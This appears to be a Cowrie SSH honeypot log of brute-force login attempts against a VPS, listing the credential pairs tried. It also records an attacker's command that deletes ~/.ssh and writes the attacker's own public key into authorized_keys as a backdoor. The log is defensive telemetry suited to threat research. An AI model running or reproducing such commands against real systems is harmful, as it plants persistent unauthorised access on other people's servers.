{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:17:12.325230Z","src_ip":"212.227.235.229","session":"26ed4a91c31c"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin1234","message":"login attempt [admin/admin1234] failed","sensor":"my-vps","timestamp":"2025-08-28T15:17:13.103886Z","src_ip":"212.227.235.229","session":"26ed4a91c31c"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:17:14.290787Z","src_ip":"212.227.235.229","session":"26ed4a91c31c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59062,"dst_ip":"1.2.3.4","dst_port":22,"session":"08458f73bafc","protocol":"ssh","message":"New connection: 212.227.235.229:59062 (1.2.3.4:22) [session: 08458f73bafc]","sensor":"my-vps","timestamp":"2025-08-28T15:18:21.477922Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:18:21.478808Z","src_ip":"212.227.235.229","session":"08458f73bafc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:18:21.662843Z","src_ip":"212.227.235.229","session":"08458f73bafc"}
{"eventid":"cowrie.login.failed","username":"notify","password":"notify","message":"login attempt [notify/notify] failed","sensor":"my-vps","timestamp":"2025-08-28T15:18:22.439010Z","src_ip":"212.227.235.229","session":"08458f73bafc"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:18:23.626330Z","src_ip":"212.227.235.229","session":"08458f73bafc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":65105,"dst_ip":"1.2.3.4","dst_port":22,"session":"44ec0499dc73","protocol":"ssh","message":"New connection: 212.227.235.229:65105 (1.2.3.4:22) [session: 44ec0499dc73]","sensor":"my-vps","timestamp":"2025-08-28T15:19:01.358425Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:19:01.467483Z","src_ip":"212.227.235.229","session":"44ec0499dc73"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57406,"dst_ip":"1.2.3.4","dst_port":22,"session":"52bcde07aca2","protocol":"ssh","message":"New connection: 212.227.235.229:57406 (1.2.3.4:22) [session: 52bcde07aca2]","sensor":"my-vps","timestamp":"2025-08-28T15:19:31.829739Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:19:31.830642Z","src_ip":"212.227.235.229","session":"52bcde07aca2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:19:32.015854Z","src_ip":"212.227.235.229","session":"52bcde07aca2"}
{"eventid":"cowrie.login.failed","username":"asd","password":"asd","message":"login attempt [asd/asd] failed","sensor":"my-vps","timestamp":"2025-08-28T15:19:32.800030Z","src_ip":"212.227.235.229","session":"52bcde07aca2"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:19:33.987885Z","src_ip":"212.227.235.229","session":"52bcde07aca2"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":63132,"dst_ip":"1.2.3.4","dst_port":22,"session":"bafc2838946e","protocol":"ssh","message":"New connection: 217.72.205.35:63132 (1.2.3.4:22) [session: bafc2838946e]","sensor":"my-vps","timestamp":"2025-08-28T15:19:49.789641Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:19:49.790748Z","src_ip":"217.72.205.35","session":"bafc2838946e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50044,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f30bb601af9","protocol":"ssh","message":"New connection: 212.227.125.160:50044 (1.2.3.4:22) [session: 6f30bb601af9]","sensor":"my-vps","timestamp":"2025-08-28T15:20:20.576394Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:20:20.580333Z","src_ip":"212.227.125.160","session":"6f30bb601af9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50340,"dst_ip":"1.2.3.4","dst_port":22,"session":"69da3f86f778","protocol":"ssh","message":"New connection: 212.227.125.160:50340 (1.2.3.4:22) [session: 69da3f86f778]","sensor":"my-vps","timestamp":"2025-08-28T15:20:20.696211Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T15:20:20.696973Z","src_ip":"212.227.125.160","session":"69da3f86f778"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T15:20:20.812042Z","src_ip":"212.227.125.160","session":"69da3f86f778"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:20:21.156023Z","src_ip":"212.227.125.160","session":"69da3f86f778"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T15:20:21.270972Z","session":"69da3f86f778"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55784,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e67014278b4","protocol":"ssh","message":"New connection: 212.227.235.229:55784 (1.2.3.4:22) [session: 2e67014278b4]","sensor":"my-vps","timestamp":"2025-08-28T15:20:42.738958Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:20:42.739767Z","src_ip":"212.227.235.229","session":"2e67014278b4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:20:42.918113Z","src_ip":"212.227.235.229","session":"2e67014278b4"}
{"eventid":"cowrie.login.success","username":"root","password":"1Qaz1Qaz","message":"login attempt [root/1Qaz1Qaz] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:20:43.671588Z","src_ip":"212.227.235.229","session":"2e67014278b4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:20:44.045669Z","src_ip":"212.227.235.229","session":"2e67014278b4"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:20:44.046394Z","src_ip":"212.227.235.229","session":"2e67014278b4"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:20:44.047508Z","src_ip":"212.227.235.229","session":"2e67014278b4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:20:44.226859Z","src_ip":"212.227.235.229","session":"2e67014278b4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:20:44.646227Z","src_ip":"212.227.235.229","session":"2e67014278b4"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T15:20:44.647165Z","src_ip":"212.227.235.229","session":"2e67014278b4"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T15:20:44.827965Z","src_ip":"212.227.235.229","session":"2e67014278b4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:20:44.829114Z","src_ip":"212.227.235.229","session":"2e67014278b4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56400,"dst_ip":"1.2.3.4","dst_port":22,"session":"57925d72e4f3","protocol":"ssh","message":"New connection: 212.227.235.229:56400 (1.2.3.4:22) [session: 57925d72e4f3]","sensor":"my-vps","timestamp":"2025-08-28T15:20:45.009419Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:20:45.010199Z","src_ip":"212.227.235.229","session":"57925d72e4f3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:20:45.193408Z","src_ip":"212.227.235.229","session":"57925d72e4f3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T15:20:45.966806Z","src_ip":"212.227.235.229","session":"57925d72e4f3"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:20:47.154480Z","src_ip":"212.227.235.229","session":"57925d72e4f3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57574,"dst_ip":"1.2.3.4","dst_port":22,"session":"08e610b81ea8","protocol":"ssh","message":"New connection: 212.227.235.229:57574 (1.2.3.4:22) [session: 08e610b81ea8]","sensor":"my-vps","timestamp":"2025-08-28T15:20:47.332550Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:20:47.333495Z","src_ip":"212.227.235.229","session":"08e610b81ea8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:20:47.512016Z","src_ip":"212.227.235.229","session":"08e610b81ea8"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:20:48.268388Z","src_ip":"212.227.235.229","session":"08e610b81ea8"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:20:48.448490Z","src_ip":"212.227.235.229","session":"08e610b81ea8"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:20:48.449389Z","src_ip":"212.227.235.229","session":"2e67014278b4"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:21:30.696347Z","src_ip":"212.227.125.160","session":"69da3f86f778"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54506,"dst_ip":"1.2.3.4","dst_port":22,"session":"90fa5edb00f5","protocol":"ssh","message":"New connection: 212.227.235.229:54506 (1.2.3.4:22) [session: 90fa5edb00f5]","sensor":"my-vps","timestamp":"2025-08-28T15:21:52.111817Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:21:52.112497Z","src_ip":"212.227.235.229","session":"90fa5edb00f5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:21:52.294840Z","src_ip":"212.227.235.229","session":"90fa5edb00f5"}
{"eventid":"cowrie.login.failed","username":"test11","password":"test11","message":"login attempt [test11/test11] failed","sensor":"my-vps","timestamp":"2025-08-28T15:21:53.061578Z","src_ip":"212.227.235.229","session":"90fa5edb00f5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48410,"dst_ip":"1.2.3.4","dst_port":22,"session":"0232fac33eeb","protocol":"ssh","message":"New connection: 212.227.235.229:48410 (1.2.3.4:22) [session: 0232fac33eeb]","sensor":"my-vps","timestamp":"2025-08-28T15:21:53.523219Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T15:21:53.524393Z","src_ip":"212.227.235.229","session":"0232fac33eeb"}
